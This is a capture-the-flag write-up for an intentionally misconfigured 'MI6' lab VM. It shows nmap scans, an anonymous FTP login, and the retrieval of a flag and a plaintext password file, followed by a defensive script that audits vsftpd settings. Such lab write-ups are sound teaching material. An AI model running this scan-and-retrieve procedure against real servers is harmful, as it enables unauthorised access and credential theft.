Tags: mj0ln1r invaders0x1 pentest 

# MI6Configuration

Description:

```text
We recently acquired a computer at MI6 and it seems like they might have made some mistakes. Can you hack it using their misconfigurations and get all their important data? (Download the VM file and power it on. Find the IP address and start hacking!)

*Note - there are 3 flags, flag2 does not exist*

https://byu.app.box.com/s/kqlgq3h7t43jqm7k0q124a1eivkonqln
```

Let's do some pentesting here.

Imported the MI6.ova file into VirtualBox and installed it successfully, then booted it up. The boot screen password was the first name of the James Bond character Q, so the password was `major`. This only completed the boot; it was not the actual login password for the machine.

The MI6 machine looks like this after booting.

![img](https://themj0ln1r.github.io/assets/img/post_img/byu23_mi6.png/)

+ Did a quick nmap scan from my Parrot machine against the MI6 machine.

```sh
┌─[attacker@parrot]─[~]
└──╼ $nmap -Pn -sV 192.168.0.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-24 18:31 IST
Nmap scan report for 192.168.0.133
Host is up (0.00098s latency).
Not shown: 729 filtered tcp ports (no-response), 269 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.28 seconds
```

Tried the default NSE scripts on the target.

```sh
┌─[attacker@parrot]─[~]
└──╼ $nmap -Pn -sC 192.168.0.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-24 18:33 IST
Nmap scan report for 192.168.0.133
Host is up (0.00057s latency).
Not shown: 729 filtered tcp ports (no-response), 269 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 33 0 22 Apr 17 22:01 flag1.txt
|_-r--r--r-- 1 1002 0 29 Apr 17 15:40 not_my_passwords.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.0.110
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh
| ssh-hostkey:
| 2048 c5849242153793582b2cc8f5d9eed24c (RSA)
| 256 bedc4b8fcfd3c50281bab7791f2b9afa (ECDSA)
|_ 256 7b1fecd2c294bf1b1984f322005cde02 (ED25519)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
```

Cool, there was an `anonymous` login available to the ftp service and two files were available to read.

```sh
┌─[attacker@parrot]─[~]
└──╼ $ftp 192.168.0.133
Connected to 192.168.0.133.
220 (vsFTPd 3.0.3)
Name (192.168.0.133:attacker): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--r--r-- 1 33 0 22 Apr 17 22:01 flag1.txt
-r--r--r-- 1 1002 0 29 Apr 17 15:40 not_my_passwords.txt
226 Directory send OK.
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag1.txt (22 bytes).
226 Transfer complete.
22 bytes received in 0.06 secs (0.3379 kB/s)
ftp> get not_my_passwords.txt
local: not_my_passwords.txt remote: not_my_passwords.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for not_my_passwords.txt (29 bytes).
226 Transfer complete.
29 bytes received in 0.02 secs (1.2592 kB/s)
ftp>
221 Goodbye.
┌─[attacker@parrot]─[~]
└──╼ $cat flag1.txt
byuctf{anonymous_ftp}
┌─[attacker@parrot]─[~]
└──╼ $cat not_my_passwords.txt
james_bond:imthebestAgent007
```

> `Flag 1 : byuctf{anonymous_ftp}`
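
From the defender's side, both weaknesses in the scan output (anonymous login allowed, plain-text control and data connections) can be checked directly in `vsftpd.conf`. The script below is an added example, not part of the original writeup or the challenge; the option names and defaults are those documented for vsftpd, while the two sample configs are constructed for illustration and are not complete server configurations.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit a vsftpd.conf for the
# two weaknesses visible in the scan output above.

# Print the effective value of a boolean option. Later lines override earlier
# ones; a missing or commented-out option falls back to the built-in default.
vsftpd_opt() {  # usage: vsftpd_opt FILE KEY DEFAULT
    awk -F= -v key="$2" -v val="$3" '
        /^[ \t]*#/ { next }              # comment line, has no effect
        $1 == key  { val = $2 }          # vsftpd allows no spaces around "="
        END { sub(/[ \t\r]+$/, "", val); print toupper(val) }
    ' "$1"
}

is_on() { case "$1" in YES|TRUE|1) return 0 ;; *) return 1 ;; esac; }

# Print one finding per line; print nothing when the file passes.
audit_vsftpd() {  # usage: audit_vsftpd FILE
    conf=$1
    # anonymous_enable defaults to YES, so a missing line is still a finding.
    if is_on "$(vsftpd_opt "$conf" anonymous_enable YES)"; then
        echo "anonymous_enable: anonymous FTP login is allowed"
        is_on "$(vsftpd_opt "$conf" write_enable NO)" &&
            is_on "$(vsftpd_opt "$conf" anon_upload_enable NO)" &&
            echo "anon_upload_enable: anonymous users can upload files"
    fi
    is_on "$(vsftpd_opt "$conf" ssl_enable NO)" ||
        echo "ssl_enable: control and data connections are plain text"
    return 0
}

# Constructed sample configs (not taken from the challenge VM).
weak=$(mktemp); hard=$(mktemp)
trap 'rm -f "$weak" "$hard"' EXIT
printf '%s\n' 'listen=YES' '#anonymous_enable=NO' 'local_enable=YES' > "$weak"
printf '%s\n' 'listen=YES' 'anonymous_enable=NO' 'ssl_enable=YES' > "$hard"

echo "weak config:";     audit_vsftpd "$weak"
echo "hardened config:"; audit_vsftpd "$hard"
```

The weak sample is flagged even though it never sets `anonymous_enable=YES`: the only mention of the option is commented out, so the built-in default applies.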

# [Original Writeup](https://themj0ln1r.github.io/posts/byuctf23)
